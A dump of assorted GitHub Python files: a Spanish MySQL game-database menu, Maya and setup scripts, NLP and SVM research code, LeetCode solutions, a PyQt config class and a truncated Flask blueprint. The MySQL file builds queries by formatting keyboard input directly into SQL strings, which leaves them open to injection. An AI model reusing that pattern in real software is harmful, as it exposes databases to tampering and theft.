+{"seq_id":"36168796165","text":"import sys\nimport MySQLdb\n\ndef Conectar_BD(host,usuario,password,nombrebd):\n try:\n db = MySQLdb.connect(host,usuario,password,nombrebd)\n return db\n except MySQLdb.Error as e:\n print(\"No puedo conectar a la base de datos:\",e)\n sys.exit(1)\n\ndef Desconectar_BD(db):\n db.close()\n\ndef ListarMapas(db):\n sql=\"select * from Mapas\"\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"],\"---\",registro[\"nZonas\"],\" zonas\")\n except:\n print(\"Error en la consulta\")\n\ndef MonstruoSubcadena(db,monstruo):\n sql = \"SELECT * FROM Monstruos WHERE nombre REGEXP '^%s'\"%(monstruo)\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"])\n return registro[\"nombre\"]\n\n except:\n print(\"Error en la consulta\")\n\ndef ObjetoMonstruo(db,monstruo):\n MonstruoSubcadena(db,monstruo)\n sql = \"SELECT * FROM Objetos WHERE monstruo = (SELECT idMonstruo FROM Monstruos WHERE nombre REGEXP '^%s')\"%(monstruo)\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"])\n except:\n print(\"Error en la consulta\")\n\ndef NuevoMonstruo(db,nuevo):\n cursor = db.cursor()\n sql=\"insert into Monstruos values (%s, '%s', '%s', %f )\" % (nuevo[\"idMonstruo\"],nuevo[\"nombre\"],nuevo[\"tipo\"],nuevo[\"tamano\"])\n try:\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error al insertar.\")\n db.rollback()\n\ndef borrarObjeto(db,monstruo):\n buscar = MonstruoSubcadena(db,monstruo)\n sql=\"delete from Objetos where monstruo=(select idMonstruo from Monstruos where nombre = '%s')\" % buscar\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n if cursor.rowcount==0:\n print(\"No hay objetos relacionados con ese monstruo\")\n except:\n print(\"Error al borrar.\")\n db.rollback()\n\ndef AumentarValor(db,porcentaje):\n sql = \"update Objetos SET valor = valor+(valor*%f)/100\"%porcentaje\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error al cambiar\")\n db.rollback()\n\ndef MostrarMenu():\n menu='''\n 1. Lista los mapas y el total de zonas que tiene cada uno.\n 2. Muestra los monstruos que empiecen por una subcadena.\n 3. Pide por teclado un monstruo y muestra los objetos que suelta al morir.\n 4. Inserta un nuevo monstruo en la tabla Monstruos.\n 5. Borra los objetos de un monstruo indicado por teclado.\n 6. aumenta el valor de los objetos un porcentaje indicado por teclado.\n 0. Salir\n '''\n print(menu)\n while True:\n try:\n opcion=int(input(\"Opción:\"))\n return opcion\n except:\n print(\"Opción incorrecta, debe ser un número\")","repo_name":"robertorodriguez98/proyecto_BD","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71659692203","text":"#######################################\n# imports\n\nimport maya.cmds as cmds\n\nimport esa.maya.python.lib.deploy as deploy\n\nreload(deploy)\n\n#######################################\n# attributes\n\npermission = \"developer\"\n\n#######################################\n# functionality\n\ndef deployCurrentToolCageRun():\n\tdeploy.deployCurrentToolCageDev()\n\tcmds.confirmDialog(t=\"msg\", message=\"Current ToolGage DEV deployed to TOOLS.\", button=[\"OK\"]) \n\n#######################################\n# execution\n\nif __name__ == \"__main__\": deployCurrentToolCageRun()","repo_name":"esernaalonso/dev","sub_path":"maya/python/script/deployCurrentToolCage.py","file_name":"deployCurrentToolCage.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"27657369783","text":"import codecs\nimport jpype\nimport glob\nimport nltk\nfrom nltk.probability import ConditionalFreqDist\nfrom nltk.tokenize import RegexpTokenizer,sent_tokenize\n\nword_count_dict = {}\n\ndef startJVM():\n\n jpype.startJVM(jpype.getDefaultJVMPath(),\n \"-Djava.class.path=C:/Users/vct_3/Desktop/Tezim/zemberek_jar/zemberek-tum-2.0.jar\", \"-ea\")\n\n Tr = jpype.JClass(\"net.zemberek.tr.yapi.TurkiyeTurkcesi\")\n\n tr = Tr()\n\n Zemberek = jpype.JClass(\"net.zemberek.erisim.Zemberek\")\n\n zemberek = Zemberek(tr)\n return zemberek\n#kelime analizi yapılacak dosyalar okunur\ndef readFile(filename):\n corpus_raw = u\"\"\n print(\"Reading '{0}'...\".format(filename))\n with codecs.open(filename, \"r\") as book_file:\n corpus_raw += book_file.read()\n return corpus_raw\n\n#gelen kelimelerin türü belirlenir\ndef kelimeCozumle(words, zemberek, word_types):\n for word in words:\n if word.strip()>'':\n yanit = zemberek.kelimeCozumle(word)\n if yanit:\n tip = yanit[0].kok().tip()\n if str(tip) in word_types:\n word_types[str(tip)] = word_types[str(tip)] + 1\n\n\ndef explodeSentences(sentences, punkt_dict, zemberek, word_types):\n #cümleler kelimelere parçalanır\n words = []\n for sentence in sentences:\n words.extend(sentence.split())\n kelimeCozumle(sentence.split(), zemberek, word_types)\n\n #Cümle içindeki noktalama işaretlerinin sayısı\n for word in words:\n for punkt in punkt_dict:\n if punkt in word:\n punkt_dict[punkt] = punkt_dict[punkt] + 1\n\n #metin içindeki farklı kelime sayısı\n from collections import Counter\n word_count_dict = Counter(w.title() for w in words)\n return words, word_count_dict\n\ndef writeFile(result):\n file = open(\"clear_data.csv\",\"w\")\n file.write(result)\n file.close()\n\n\ndef startApp():\n # Zemberek nesnesi oluşturuldu.\n zemberek = startJVM()\n book_filenames = sorted(glob.glob(\"C:/Users/vct_3/Desktop/Köşe Yazıları Kopya/*.txt\"))\n result = \"\"\n\n for filename in book_filenames:\n\n punkt_dict = {\"!\": 0, \".\": 0, \",\": 0, \"?\": 0, \":\": 0}\n word_types = {\"ISIM\": 0, \"FIIL\": 0, \"SIFAT\": 0, \"ZAMIR\": 0, \"ZARF\": 0, \"BAGLAC\": 0, \"EDAT\": 0, \"ZAMAN\": 0,\n \"SAYI\": 0, \"OZEL\": 0, \"KISALTMA\": 0, \"SORU\": 0}\n\n # Dosyayı oku\n text = readFile(filename)\n # Dosyadaki cümleleri ayıkla\n sentences = sent_tokenize(text)\n words, word_count_dict = explodeSentences(sentences, punkt_dict, zemberek, word_types)\n\n # Okunan metni dosyaya yazılmak için csv formatına getir.\n result = result + str(len(sentences)) + \",\"\n result = result + str(len(words)) + ',' + str(len(word_count_dict)) + ','\n\n for key, value in punkt_dict.items():\n result = result + str(value) + ','\n for key, value in word_types.items():\n result = result + str(value) + ','\n result = result + (filename.split(\"-\")[1])[:-4] + \"\\n\"\n writeFile(result)\n\n\nstartApp()\n\n# JVM kapat\njpype.shutdownJVM()\n","repo_name":"Souljah1881/Yazar_Tanima","sub_path":"Get_Attributes/Getting_Attributes_of_Authors.py","file_name":"Getting_Attributes_of_Authors.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"20780306773","text":"\"\"\"\nSetup script for libanac\n\"\"\"\n\nimport sys\nfrom setuptools import setup\n\nimport libanac\n\n\ninstall_requires = [\n 'beautifulsoup4',\n 'requests',\n]\n\nif sys.version_info[:2] < (2, 7):\n install_requires.append('argparse')\n\n\nsetup(\n name=libanac.__title__,\n description=libanac.__summary__,\n long_description=open('README.rst').read(),\n url=libanac.__url__,\n\n author=libanac.__author__,\n author_email=libanac.__email__,\n license=libanac.__license__,\n\n version=libanac.__version__,\n\n packages=['libanac'],\n test_suite='tests',\n\n platforms='any',\n keywords=['ANAC', 'SACI', 'CIV Digital'],\n classifiers=[\n 'Natural Language :: English',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: BSD',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Microsoft :: Windows',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n ],\n\n install_requires=install_requires,\n)\n","repo_name":"asenci/libanac","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"14430117998","text":"from time import sleep\nfrom os import system, name as sysname\n\ndef animation(level):\n with open(level, \"r\", encoding=\"utf-8\") as f:\n lines = f.readlines()\n f.close()\n\n ascii_lines = lines[2:26]\n truncated_ascii_lines = [line[:80] for line in ascii_lines]\n system(\"clear\") if sysname == \"posix\" else system(\"cls\")\n\n for line in truncated_ascii_lines:\n print(line)\n\n sleep(5)\n\n for x in range(220):\n print(\"\\033[26A\", end= \"\")\n print(\"\\033[2K\", end = \"\") # erase old line, return cursor to beginning\n truncated_ascii_lines = [line[x+1:80+x+1] for line in ascii_lines]\n sleep(0.04)\n for line in truncated_ascii_lines:\n print(line)\n sleep(5)\n\nanimation(\"level0.txt\")","repo_name":"Spellcasting-Devs/Mundane-Reclamation","sub_path":"testing/animation/text_animation.py","file_name":"text_animation.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"3252468522","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 28 2022\n\n@author: yun\n@purpose: Find cycle in graph. Used for identify all ternary zone in Ca-Na-VP phase diagram.\nThis used for calculation chemical potential of Ca, Na and VPO.\n\n# Need to be moved to somewhere else. Need polishing.\n\"\"\"\nimport numpy as np\nfrom compmatscipy.CompAnalyzer import CompAnalyzer\n\n\nclass ternary_chempo:\n\n def __init__(self, edges, data):\n \"\"\"\n Args:\n edges: list of tuples with form [(std formula, std formula)]\n data: energy dictionary with form {'std formula': energy per atom}\n \"\"\"\n self.edges = edges\n self.data = data\n self.cycles = []\n self.vertices = []\n for edge in self.edges:\n for vertex in edge:\n if vertex not in self.vertices:\n self.vertices.append(vertex)\n self.parse_cycles()\n\n @staticmethod\n def gcd(a, b, rtol=1e-03, atol=1e-03):\n # Need caution. Do not use after rounding floats < 3.\n t = min(abs(a), abs(b))\n while abs(b) > rtol * t + atol:\n a, b = b, a % b\n return a\n\n @staticmethod\n def invert(path) -> list:\n\n return ternary_chempo.rotate_to_smallest(path[::-1])\n\n @staticmethod\n # rotate cycle path such that it begins with the smallest node\n def rotate_to_smallest(path) -> list:\n\n n = path.index(min(path))\n return path[n:] + path[:n]\n\n @staticmethod\n def is_visited_node(node, path) -> bool:\n\n return node in path\n\n @staticmethod\n def cmpd_to_fraction(cmpd) -> tuple:\n \"\"\"\n Args:\n Standard Formula\n Returns:\n tuple of Ca, Na in V2(PO4)3\n \"\"\"\n ca = CompAnalyzer(cmpd)\n reduced_ratio = (ca.amt_of_el('O')) / 12\n ca_amt = ca.amt_of_el('Ca') / reduced_ratio\n na_amt = ca.amt_of_el('Na') / reduced_ratio\n\n return ca_amt, na_amt\n\n @staticmethod\n def fraction_to_cmpd(fraction) -> str:\n \"\"\"\n Args:\n tuple of Ca, Na in V2(PO4)3\n Returns:\n Standard Formula\n \"\"\"\n ratio = ternary_chempo.gcd(fraction[0], fraction[1])\n for i in [2, 3, 12]:\n ratio = ternary_chempo.gcd(ratio, i)\n\n formula = ''\n if not fraction[1] == 0:\n formula += 'Na' + str(fraction[1] / ratio)\n if not fraction[0] == 0:\n formula += 'Ca' + str(fraction[0] / ratio)\n\n formula += 'V' + str(np.round(2 / ratio, 3)) + \\\n 'P' + str(np.round(3 / ratio, 3)) + \\\n 'O' + str(np.round(12 / ratio, 3))\n ca = CompAnalyzer(formula)\n\n return ca.std_formula()\n\n @staticmethod\n def is_three_on_line(x, y, z) -> bool:\n\n return (x[0] * (y[1] - z[1]) + y[0] * (z[1] - x[1]) + z[0] * (x[1] - y[1])) == 0\n\n @staticmethod\n def is_point_in_triangle(s, x, y, z) -> bool:\n\n sx = [s[0] - x[0], s[1] - x[1]]\n s_xy = ((y[0] - x[0]) * sx[1] - (y[1] - x[1]) * sx[0]) > 0\n\n if ((z[0] - x[0]) * sx[1] - (z[1] - x[1]) * sx[0] > 0) == s_xy:\n return False\n if ((z[0] - y[0]) * (s[1] - y[1]) - (z[1] - y[1]) * (s[0] - y[0]) > 0) != s_xy:\n return False\n if s == x or s == y or s == z:\n return False\n\n return True\n\n def is_new_path(self, path) -> bool:\n\n return not (path in self.cycles)\n\n def find_new_cycles(self, path) -> None:\n \"\"\"\n Args:\n path: line connecting vertices.\n Returns:\n Add new cycle to self.cycles.\n This does not consider line or non-smallest cycles.\n \"\"\"\n start_node = path[0]\n\n # visit each edge and each node of each edge\n for edge in self.edges:\n node1, node2 = edge\n if start_node in edge:\n if node1 == start_node:\n next_node = node2\n else:\n next_node = node1\n if not ternary_chempo.is_visited_node(next_node, path):\n # neighbor node not on path yet\n sub = [next_node]\n sub.extend(path)\n # explore extended path\n self.find_new_cycles(sub)\n elif len(path) == 3 and next_node == path[-1]:\n # cycle found\n p = ternary_chempo.rotate_to_smallest(path)\n inv = ternary_chempo.invert(p)\n if self.is_new_path(p) and self.is_new_path(inv):\n self.cycles.append(p)\n\n def parse_cycles(self) -> None:\n \"\"\"\n Returns:\n None. update self.cycles.\n parse cycles that are in same line or non-smallest.\n \"\"\"\n for edge in self.edges:\n for node in edge:\n self.find_new_cycles([node])\n\n # change string to fraction of Ca, Na.\n fractions = []\n for i in self.cycles:\n temp = []\n for j in i:\n temp.append(ternary_chempo.cmpd_to_fraction(j))\n fractions.append(temp)\n\n # For removing line or triangle that has point in it.\n min_cycle_list = []\n for i in fractions:\n if not ternary_chempo.is_three_on_line(i[0], i[1], i[2]):\n point_in = False\n for j in self.vertices:\n if ternary_chempo.is_point_in_triangle(ternary_chempo.cmpd_to_fraction(j),\n i[0], i[1], i[2]):\n point_in = True\n break\n if point_in:\n continue\n else:\n min_cycle_list.append(i)\n\n self.cycles = []\n for i in min_cycle_list:\n temp = []\n for j in i:\n temp.append(ternary_chempo.fraction_to_cmpd(j))\n self.cycles.append(tuple(temp))\n\n return\n\n def get_chempo_at_one_cycle(self, x, y, z) -> tuple:\n \"\"\"\n Args:\n x, y, z: str of three coordinates in cycles. In std formula.\n Returns:\n Chemical potential of Ca/Na/VPO\n \"\"\"\n concentrations = np.zeros((3, 3))\n energies = np.zeros((3, 1))\n for i, j in enumerate([x, y, z]):\n ca, na = ternary_chempo.cmpd_to_fraction(j)\n concentrations[i, :] = np.array([ca, na, 17])\n energies[i] = self.data[j] * (ca + na + 17)\n\n chempo = np.linalg.inv(concentrations) @ energies\n\n return chempo\n\n \"\"\"\n Ca_voltage = (-chempo[0][0] - 2.0056) / 2\n Na_voltage = (-chempo[1][0] - 1.3225) / 1\n \"\"\"\n\n def get_chempo_at_cycles(self):\n\n chempo_dict = {}\n for i in self.cycles:\n chempo_dict[i] = self.get_chempo_at_one_cycle(i[0], i[1], i[2])\n\n return chempo_dict\n","repo_name":"YunyeongChoi/CaNaVP","sub_path":"plot/chempo_utils.py","file_name":"chempo_utils.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"27387358415","text":"from django.urls import path\n\nfrom .views import *\n\nurlpatterns = [\n path('', OrganizationHome.as_view(), name='orgs'),\n path('keys/', index, name='keys'),\n path('del_org//', delete_org, name=\"del_org\"),\n path('create_org/', create_org, name=\"create_org\"),\n path('update_org//', update_org, name=\"update_org\"),\n path('del_key//', delete_key, name=\"del_key\"),\n path('create_key/', create_key, name=\"create_key\"),\n path('update_key//', update_key, name=\"update_key\"),\n]\n","repo_name":"daniluuuuuuuk/belgosles_test_task","sub_path":"src/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"35455550664","text":"\"\"\"\ninterface Robot {\n // returns true if next cell is open and robot moves into the cell.\n // returns false if next cell is obstacle and robot stays on the current cell.\n boolean move();\n\n // Robot will stay on the same cell after calling turnLeft/turnRight.\n // Each turn will be 90 degrees.\n void turnLeft();\n void turnRight();\n\n // Clean the current cell.\n void clean();\n}\nExample:\n\nInput:\nroom = [\n [1,1,1,1,1,0,1,1],\n [1,1,1,1,1,0,1,1],\n [1,0,1,1,1,1,1,1],\n [0,0,0,1,0,0,0,0],\n [1,1,1,1,1,1,1,1]\n],\nrow = 1,\ncol = 3\n\nExplanation:\nAll grids in the room are marked by either 0 or 1.\n0 means the cell is blocked, while 1 means the cell is accessible.\nThe robot initially starts at the position of row=1, col=3.\nFrom the top left corner, its position is one row below and three columns right.\n\n\"\"\"\n\n\n\n\"\"\"\nWhen we come to a new cell, we turn left. \nIf we try to go and turn right 3 times, \nwe have covered everything in front of us and we should backtrack. \nIf we can go to a direction, since we are facing backward for backtracking, \nwe should turn left instead of right (if we didn't go, \nwe would still face the direction, not its reverse). \nAlso, when we are done with a cell, we should come back from it. \nHere is a minimalist code to solve the problem.\n\"\"\"\n\nDIRS = [[-1, 0], [0, 1], [1, 0], [0, -1]] # facing up, turning right as index increases\n\n\ndef dfs(robot, coord, dindex, visited):\n visited.add(coord)\n robot.clean()\n last_move = True\n for di in [3, 0, 1, 2]:\n robot.turnLeft() if last_move else robot.turnRight()\n d = DIRS[(dindex + di) % 4]\n new_c = (coord[0] + d[0], coord[1] + d[1])\n\n if new_c not in visited and robot.move():\n dfs(robot, new_c, (dindex + di) % 4, visited)\n robot.move() # come back\n last_move = True\n else:\n last_move = False\n\n\nclass Solution5:\n def cleanRoom(self, robot):\n DIRS = [[-1, 0], [0, 1], [1, 0], [0, -1]] # facing up, turning right as index increases\n visited = set()\n\n def dfs(robot, coord, dindex):\n visited.add(coord)\n robot.clean()\n last_move = True\n\n for di in [3, 0, 1, 2]:\n if last_move: # 固定先左后右\n robot.turnLeft()\n else:\n robot.turnRight()\n d = DIRS[(dindex + di) % 4] # 調整方向\n new_c = (coord[0] + d[0], coord[1] + d[1]) # 下一步的位置\n\n if new_c not in visited and robot.move(): # 看一看可不可以前進\n dfs(robot, new_c, (dindex + di) % 4) # 前進\n robot.move() # come back #精華,有前進就必須有相應的後退!!!原路返回\n last_move = True # 下一步繼續嘗試向左轉\n else: # 某個點訪問過了或者不可訪問\n last_move = False # 下一步向右轉\n\n dfs(robot, (0, 0), 0)\n\nclass Solution:\n def cleanRoom(self, robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n dfs(robot, (0, 0), 0, set())\n\n\n# left, up, right, down\nDIR = ((0, -1), (-1, 0), (0, 1), (1, 0))\n\n\nclass Solution6:\n def cleanRoom(self, robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n # assume we start at (0, 0) the origin\n self.dfs(robot, (0, 0), set(), 1)\n\n def dfs(self, robot, curr_pos, visited, facing_direction):\n robot.clean()\n visited.add(curr_pos)\n\n for i in range(4):\n robot.turnLeft()\n # for i in [0, 3], i+1 means how many times we have turned left\n # (facing_direction - (i + 1)) % 4 therefore, is our new facing direction\n new_direction = (facing_direction - i - 1) % 4\n new_pos = (curr_pos[0] + DIR[new_direction][0], curr_pos[1] + DIR[new_direction][1])\n if new_pos not in visited and robot.move():\n self.dfs(robot=robot,\n curr_pos=new_pos,\n visited=visited,\n facing_direction=new_direction)\n # turn around\n robot.turnLeft()\n robot.turnLeft()\n # move back\n robot.move()\n # face the previous direction, such that we can continue turning left\n robot.turnLeft()\n robot.turnLeft()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Taoge123/OptimizedLeetcode","sub_path":"LeetcodeNew/DFS/LC_489_Robot_Room_Cleaner.py","file_name":"LC_489_Robot_Room_Cleaner.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"15156237694","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\n\ndef gen_callgraph(callgraph_file):\n callgraph = {}\n for line in callgraph_file.readlines():\n fields = line.split(':')\n caller = int(fields[0])\n callees_strs = fields[1].split(',')\n callees = set(map(lambda item: int(item), callees_strs[:-1]))\n callgraph[caller] = callees\n return callgraph \n\n\ndef gen_funcIdCost(funcIdCost_file):\n funcIdCost = {}\n for line in funcIdCost_file.readlines():\n fields = line.split(',')\n funcId = int(fields[0])\n cost = int(fields[1])\n funcIdCost[funcId] = cost\n return funcIdCost\n\n\ndef gen_most_complexity(comp_file):\n comp_99_func_ids = set()\n comp_2_func_ids = set()\n comp_1_func_ids = set()\n for line in comp_file.readlines():\n fields = line.split(',')\n try:\n func_id = int(fields[0])\n except:\n continue\n comp = int(fields[1])\n if comp == 99:\n comp_99_func_ids.add(func_id)\n if comp == 2:\n comp_2_func_ids.add(func_id)\n if comp == 1:\n comp_1_func_ids.add(func_id)\n if len(comp_99_func_ids) > 10:\n print(\"2^N\")\n return comp_99_func_ids\n elif len(comp_2_func_ids) > 0:\n print(\"N^2\")\n return comp_2_func_ids\n else:\n print(\"N\")\n return comp_1_func_ids\n\n\ndef gen_full_callgraph(callgraph):\n full_callgraph = {}\n for caller, callees in callgraph.items():\n worklist = []\n visited = set()\n for callee in callees:\n worklist.append(callee)\n while len(worklist) > 0:\n curr = worklist.pop()\n if curr in full_callgraph:\n for curr_full_callee in full_callgraph[curr]:\n visited.add(curr_full_callee)\n continue\n if curr not in callgraph:\n continue\n for curr_callee in callgraph[curr]:\n if curr_callee not in visited:\n worklist.append(curr_callee)\n visited.add(curr_callee)\n full_callgraph[caller] = visited\n return full_callgraph\n\n\ndef insert_sort(arr, full_callgraph):\n n = len(arr)\n new_arr = []\n new_arr.append(arr[0])\n\n for i in range(1, n):\n j = 0\n insert_flag = False\n while j < len(new_arr):\n if new_arr[j] in full_callgraph \\\n and arr[i] in full_callgraph[new_arr[j]]:\n new_arr.insert(j, arr[i])\n insert_flag = True\n break\n j += 1\n if not insert_flag:\n new_arr.append(arr[i])\n return new_arr\n\n\ndef gen_rank(callgraph, funcIdCost, compFuncIds):\n compFuncIdCost = dict(filter(lambda elem: elem[0] in compFuncIds, funcIdCost.items()))\n compFuncIdSortedByCost = sorted(compFuncIdCost, key=compFuncIdCost.get, reverse=True)\n # for funcId in compFuncIdSortedByCost:\n # print(funcId, compFuncIdCost[funcId])\n full_callgraph = gen_full_callgraph(callgraph)\n #full_callgraph = callgraph\n rank = insert_sort(compFuncIdSortedByCost, full_callgraph)\n for funcId in rank:\n print(funcId, compFuncIdCost[funcId])\n #lower_bound = compFuncIdCost[rank[1]] * 0.5\n #top_rank = []\n #split_idx = 0\n #for idx, funcId in enumerate(rank):\n # if compFuncIdCost[funcId] < lower_bound:\n # split_idx = idx\n # break\n # top_rank.append(funcId)\n\n ## print(\"top rank:\")\n ## for funcId in top_rank:\n ## print(funcId, compFuncIdCost[funcId])\n #new_top_rank = sorted(top_rank, key=compFuncIdCost.get)\n ## print(\"rank:\")\n #for funcId in new_top_rank:\n # print(funcId, compFuncIdCost[funcId])\n #for funcId in rank[split_idx:]:\n # print(funcId, compFuncIdCost[funcId])\n\ndef main():\n complexity_file_path = sys.argv[1]\n with open(\"callgraph.log\") as infile:\n callgraph = gen_callgraph(infile)\n with open(\"funcIdCost.log\") as infile:\n funcIdCost = gen_funcIdCost(infile)\n with open(complexity_file_path) as infile:\n compFuncIds = gen_most_complexity(infile)\n gen_rank(callgraph, funcIdCost, compFuncIds)\n\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"ComAirProject/ComAir","sub_path":"Code/scripts/ranking/gen_rank.py","file_name":"gen_rank.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"72797633322","text":"from sklearn.svm import LinearSVC\nfrom collections import OrderedDict\nfrom operator import itemgetter\nfrom evaluation import compute_wss\n\ndef prioritise_and_evaluate(X_train,\n y_train,\n X_test,\n y_test):\n \"\"\"\n Trains an L2-regularised linear SVM classifier.\n Documents in the test subset, i.e. X_test, are ranked according to the signed-margin distance between the document feature vectors and the SVM hyperplane.\n :param X_train: Training documents\n :param y_train: Training labels\n :param X_test: Test documents\n :param y_test: Test labels\n :return: work saved over sampling at 95%recall (wss_95) and 100%recall (wss_100)\n \"\"\"\n # define SVM Classifier\n linear_svc = LinearSVC(loss='squared_hinge', penalty='l2',\n dual=False, tol=1e-3, class_weight='balanced', C=0.000001)\n # train SVM classifier\n linear_svc.fit(X_train, y_train)\n\n # get predictions of test documents\n predictions = linear_svc.predict(X_test)\n\n # get distances between test documents and the SVM hyperplane.\n distances = linear_svc.decision_function(X_test)\n test_indexes_with_distances = {}\n for index, prediction in enumerate(predictions):\n test_indexes_with_distances[index] = distances[index]\n\n # order documents in a descending order of their distance to the SVM hyperplane\n test_indexes_with_distances = OrderedDict(\n sorted(test_indexes_with_distances.items(), key=itemgetter(1), reverse=True))\n\n\n # evaluate ranking in terms of work saved over 95% and 100% recall\n wss_95, wss_100 = compute_wss(indexes_with_predicted_distances=test_indexes_with_distances,\n y_test=y_test)\n return wss_95, wss_100","repo_name":"gkontonatsios/DAE-FF","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"1588219492","text":"\nimport sys, os, logging, PyQt4\nfrom logging import debug, info, warning, error, critical\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# --------------------------------------\n\nclass Config(dict):\n \n def __init__(self, rootdir):\n self.initDefaultKeys()\n self.loadAllKeys()\n if (not rootdir is None) and os.path.isdir(rootdir):\n self[\"rootdirectory\"] = rootdir\n debug(\"arg rootdirectory: %s\" % rootdir)\n return\n\n def __getattr__(self, key):\n return self[key]\n def __setattr__(self, key, value):\n self[key]=value\n\n def initDefaultKeys(self):\n info(\"Initializing default keys\")\n defaults = ( ( \"rootdirectory\", \"~/\" ),\n ( \"window/xpos\", \"0\" ),\n ( \"window/ypos\", \"0\" ),\n ( \"window/xsize\", \"250\" ),\n ( \"window/ysize\", \"150\" ) )\n for i in defaults:\n self[ i[0] ] = i[1]\n debug(\"[%s]=%s\"%(i[0], self[i[0]]))\n # default handlers\n self.handlers = [ [\"*.nes\",\"fceu\"] ]\n return\n\n def loadAllKeys(self):\n settings = QSettings()\n info(\"Loading keys from config file: %s\" % settings.fileName())\n settings.sync()\n keys = settings.allKeys()\n for i in keys:\n s = str(i)\n if s.find(\"handlers\") >= 0: continue # skip handlers\n self[s] = settings.value(i).toString()\n debug(\"[%s]=%s\"%(s, self[s]))\n self.loadHandlers(settings)\n return\n\n def loadHandlers(self, settings):\n h = []\n n = settings.beginReadArray(\"handlers\");\n if n == 0: return\n info(\"Loading %i handlers\" % n)\n for i in xrange(0, n):\n settings.setArrayIndex(i);\n glob = str(settings.value(\"glob\").toString())\n launcher = str(settings.value(\"launcher\").toString())\n h.append( [glob, launcher] )\n debug(\"[handlers][%i] = glob:%s : launcher:%s\" % (i, h[i][0], h[i][1]) )\n self.handlers = h\n settings.endArray()\n return\n\n def saveAllKeys(self):\n settings = QSettings()\n info(\"Saving keys to config file: %s\" % settings.fileName())\n for i in self:\n s = str(self[i])\n if i == \"handlers\": continue # skip handlers\n settings.setValue(i, s)\n debug(\"[%s]=%s\"%(i, s))\n self.saveHandlers(settings)\n settings.sync()\n return\n\n def saveHandlers(self, settings):\n h = self.handlers\n if len(h) == 0: return\n info(\"Saving %i handlers\" % len(h))\n settings.beginWriteArray(\"handlers\", len(h))\n for i in xrange(0, len(h)):\n settings.setArrayIndex(i)\n settings.setValue(\"glob\", h[i][0])\n settings.setValue(\"launcher\", h[i][1])\n debug(\"[handlers][%i] = glob:%s : launcher:%s\" % (i, h[i][0], h[i][1]) )\n settings.endArray()\n return\n\n","repo_name":"inmatarian/qhtpicker","sub_path":"qhtpicker/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"11689427560","text":"from flask import render_template, request, redirect\nfrom flask import Blueprint\nfrom models.album import Album\nimport repositories.album_repository as album_repository\nimport repositories.artist_repository as artist_repository\n\nalbums_blueprint = Blueprint(\"albums\", __name__)\n\n@albums_blueprint.route(\"/\")\ndef homepage():\n albums = album_repository.select_all()\n total_albums_in_stock = album_repository.total_albums_in_stock(albums)\n total_spend_on_stock = album_repository.total_spend_on_stock(albums)\n stock_alerts = False\n for album in albums:\n if album.stock_qty <= 3:\n stock_alerts = True\n break\n return render_template(\"/index.html\", albums = albums, total_albums_in_stock = total_albums_in_stock, total_spend_on_stock = total_spend_on_stock, stock_alerts = stock_alerts)\n\n@albums_blueprint.route(\"/albums\")\ndef albums():\n albums = album_repository.select_all()\n return render_template(\"albums/index.html\", albums = albums)\n\n@albums_blueprint.route(\"/albums/new\")\ndef new_album():\n artists = artist_repository.select_all()\n return render_template(\"/albums/new.html\", artists = artists)\n\n@albums_blueprint.route(\"/albums\", methods=[\"POST\"])\ndef create_album():\n artist = artist_repository.select(request.form[\"artist.id\"])\n title = request.form[\"title\"]\n year_released = request.form[\"year_released\"]\n genre = request.form[\"genre\"]\n 